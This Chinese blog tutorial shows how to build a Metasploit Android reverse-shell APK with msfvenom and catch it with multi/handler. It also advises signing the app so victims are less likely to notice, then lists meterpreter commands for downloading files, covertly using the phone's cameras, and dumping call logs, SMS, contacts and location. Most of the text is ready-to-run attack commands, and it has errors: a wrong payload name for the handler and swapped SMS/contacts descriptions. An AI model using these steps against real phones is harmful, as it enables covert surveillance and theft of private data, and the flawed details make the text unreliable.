Metasploit之渗透安卓实战
参考文献:http://www.freebuf.com/articles/terminal/104407.html
在“09-Metasploit之我的远程控制软件”教程中,因为渗透的是Windows系统
所以选用了“windows/meterpreter/reverse_tcp”模块
而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块
那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler”
并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD
这里假设我的测试环境
kali-linux: 192.168.2.146
安卓模拟环境:192.168.2.107
参考命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > /root/Desktop/pentest.apk
我的命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk
命令解析:
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机(kali-linux的IP)
LPORT 设置用来接收反弹连接的端口(kali-linux的端口)
R 设置文件格式
Location 要保存的文件位置-->/root/Desktop/是桌面,没有目录表示当前系统Home目录下
PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料
开启metasploit,并且开启相关连接,设置
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit
受害者安装并且打开会返回我们一个meterpreter连接
那么我们可以使用以下的一些常用的命令
cd -->目录切换,命令:cd / 切换到根目录
search -->搜索文件,命令:search *.jpg
download -->下载文件,命令:download test.jpg
webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载短信记录
dump_sms -->下载通讯录
geolocate -->利用谷歌地图定位(需要安装谷歌地图)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论